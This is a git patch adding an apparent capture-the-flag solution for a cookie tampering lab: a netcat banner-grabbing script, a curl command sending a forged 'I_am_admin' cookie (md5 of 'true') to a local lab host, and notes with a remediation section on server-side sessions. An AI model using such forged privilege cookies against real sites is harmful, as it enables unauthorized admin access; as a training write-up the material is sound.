From 3e0d34c9c02d467ac53842edd5949416c52a0bc4 Mon Sep 17 00:00:00 2001
From: Thomas Vanbesien <tvanbesi@proton.me>
Date: Fri, 27 Mar 2026 11:03:57 +0100
Subject: Add cookie tampering solution

---
 Cookie tampering/Resources/banner_grabbing.bash |  3 +++
 Cookie tampering/Resources/cookie_tamper.bash   |  3 +++
 Cookie tampering/Resources/notes.md             | 21 +++++++++++++++++++++
 3 files changed, 27 insertions(+)
 create mode 100755 Cookie tampering/Resources/banner_grabbing.bash
 create mode 100755 Cookie tampering/Resources/cookie_tamper.bash
 create mode 100644 Cookie tampering/Resources/notes.md

(limited to 'Cookie tampering/Resources')

diff --git a/Cookie tampering/Resources/banner_grabbing.bash b/Cookie tampering/Resources/banner_grabbing.bash
new file mode 100755
index 0000000..e17a0b2
--- /dev/null
+++ b/Cookie tampering/Resources/banner_grabbing.bash	
@@ -0,0 +1,3 @@
+#!/usr/bin/bash
+
+printf 'HEAD / HTTP/1.0\r\n\r\n' | nc 10.0.2.15 80
diff --git a/Cookie tampering/Resources/cookie_tamper.bash b/Cookie tampering/Resources/cookie_tamper.bash
new file mode 100755
index 0000000..314ff2f
--- /dev/null
+++ b/Cookie tampering/Resources/cookie_tamper.bash	
@@ -0,0 +1,3 @@
+#!/usr/bin/bash
+
+curl --cookie I_am_admin=b326b5062b2f0e69046810717534cb09 http://10.0.2.15 | grep Flag
diff --git a/Cookie tampering/Resources/notes.md b/Cookie tampering/Resources/notes.md
new file mode 100644
index 0000000..b372042
--- /dev/null
+++ b/Cookie tampering/Resources/notes.md	
@@ -0,0 +1,21 @@
+## Exploit
+
+1. Did [banner grabbing](https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/01-Information_Gathering/02-Fingerprint_Web_Server) and noticed an interesting cookie name:
+    ```bash
+    ❯ printf 'HEAD / HTTP/1.0\r\n\r\n' | nc 10.0.2.15 80                                         
+    HTTP/1.1 200 OK
+    Server: nginx/1.4.6 (Ubuntu)
+    Date: Fri, 27 Mar 2026 09:43:20 GMT
+    Content-Type: text/html
+    Connection: close
+    X-Powered-By: PHP/5.5.9-1ubuntu4.29
+    Set-Cookie: I_am_admin=68934a3e9455fa72420237eb05902327; expires=Fri, 27-Mar-2026 10:43:20 GMT; Max-Age=3600
+    ```
+1. Reverse looked up the md5 value `68934a3e9455fa72420237eb05902327` → `false`
+1. Intuited to send a request to the website with the cookie value set to the md5 hash value `true` to get the flag. Test it with `cookie_poison.bash` or directly in Firefox: **F12** → **Storage** → **Cookies**.
+
+## Fix
+
+[https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/06-Session_Management_Testing/01-Testing_for_Session_Management_Schema]()
+
+Returning a cookie is not the problem, since cookies can be necessary, or useful for holding non-sensitive data (like settings). The problem is what the cookie contains. It is pretty obvious what the cookie is for by its name "I_am_admin". Cookies are stored client-side so they should not be trusted by the server for giving user privileges. A secure approach would be sending a "session_id" cookie with a random identifier and then look up in a database the privileges associated with the given session.
-- 
cgit v1.2.3